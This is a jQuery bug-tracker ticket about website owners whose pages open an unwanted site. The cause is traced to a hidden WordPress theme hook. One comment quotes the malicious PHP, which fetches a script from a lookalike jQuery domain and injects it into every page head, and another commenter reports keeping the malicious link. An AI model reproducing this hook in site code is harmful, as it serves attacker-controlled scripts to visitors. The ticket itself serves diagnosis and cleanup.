Ticket #12113 (closed bug: invalid)
Database jqueryc_db and jquerys.org
| Reported by: | hasan.tekcan79@… | Owned by: | |
|---|---|---|---|
| Priority: | undecided | Milestone: | None |
| Component: | unfiled | Version: | 1.7.2 |
| Keywords: | Cc: | ||
| Blocking: | Blocked by: |
Description
http://www.jquerys.org/class/jquery-1.6.3.min.js
My website is using your library but, your library opens a website automatically ( http://www.watchliveonline.org)
Change History
comment:1 Changed 10 months ago by dmethvin
- Status changed from new to closed
- Resolution set to invalid
- Summary changed from Can you fix this?? to jquerys.org
comment:2 Changed 10 months ago by keeferama
I tracked this down to an include in my functions.php file within my theme folder, except mine is linking to: http://www.jqueryc.com/jquery-1.6.3.min.js. I tried changing the link to a newer version from the Google API: https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js but it broke my theme. When I changed the link back to: http://www.jqueryc.com/jquery-1.6.3.min.js it seems to have resolved itself - no rhyme or reason for it.
comment:3 Changed 10 months ago by dmethvin
- Summary changed from jquerys.org to Database jqueryc_db and jquerys.org
comment:4 in reply to: ↑ description Changed 10 months ago by anonymous
Replying to hasan.tekcan79@…:
http://www.jquerys.org/class/jquery-1.6.3.min.js
My website is using your library but, your library opens a website automatically ( http://www.watchliveonline.org)
I had the same problem and it came from malicious script in the functions.php of a wordpress theme. Delete the entire reference to Jquery Function if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){ $url="jqueryc.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $data = curl_exec($ch); curl_close($ch); echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
and it will correct the problem!
Please follow the bug reporting guidlines and use jsFiddle when providing test cases and demonstrations instead of pasting the code in the ticket.

It's a virus that happens to have taken our name. We are not involved and cannot help. Please ask for help from your web site admin or on a forum like StackOverflow.